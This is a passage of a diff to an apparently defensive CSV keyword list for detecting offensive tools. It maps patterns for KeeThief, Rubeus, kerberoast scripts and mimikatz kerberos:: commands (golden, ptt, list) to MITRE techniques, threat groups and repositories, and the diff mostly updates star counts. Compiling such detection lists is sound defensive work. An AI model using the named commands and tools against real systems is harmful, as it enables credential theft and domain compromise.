TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" -"*KeeThief.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*KeeThief.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*KeeThief.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*KeeThief.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1072","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*KeeThiefSyscalls*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10","","N/A","","","" "*keethief-syscalls*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" -"*kerberoast /*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*kerberoast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Kerberoast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*kerberoast /*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*kerberoast /*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Kerberoast.*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "*kerberoast.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" "*Kerberoast.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" -"*kerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerberoast_blind_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*kerberoast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoast_attack*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoast_blind_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*kerberoast_john_results_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*kerberoastables.txt*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z" "*kerberoasting*","offensive_tool_keyword","OSCP-Cheatsheets","kerberoasting keyword. attack that allows any domain user to request kerberos tickets from TGS that are encrypted with NTLM hash of the plaintext password of a domain user account that is used as a service account (i.e account used for running an IIS service) and crack them offline avoiding AD account lockouts.","T1558 - T1208 - T1003 - T1110","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/blackc03r/OSCP-Cheatsheets/blob/master/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting.md","1","1","N/A","N/A","1","81","33","2019-09-09T22:07:47Z","2019-09-12T22:07:31Z" "*kerberoasting.boo*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" "*kerberos*.kirbi*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/RDPHijack-BOF","1","1","N/A","10","3","257","39","2022-07-08T10:14:32Z","2022-07-08T10:14:07Z" "*kerberos/decryptor.py*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*kerberos::ask*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::clist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::golden*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::golden*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::list*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*kerberos::ptc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ask*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::clist*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::golden*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::golden*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::hash*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::list*","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::list*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. This function lists all Kerberos tickets in memory","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*kerberos::ptc*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*kerberos::ptt *.kirbi*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential 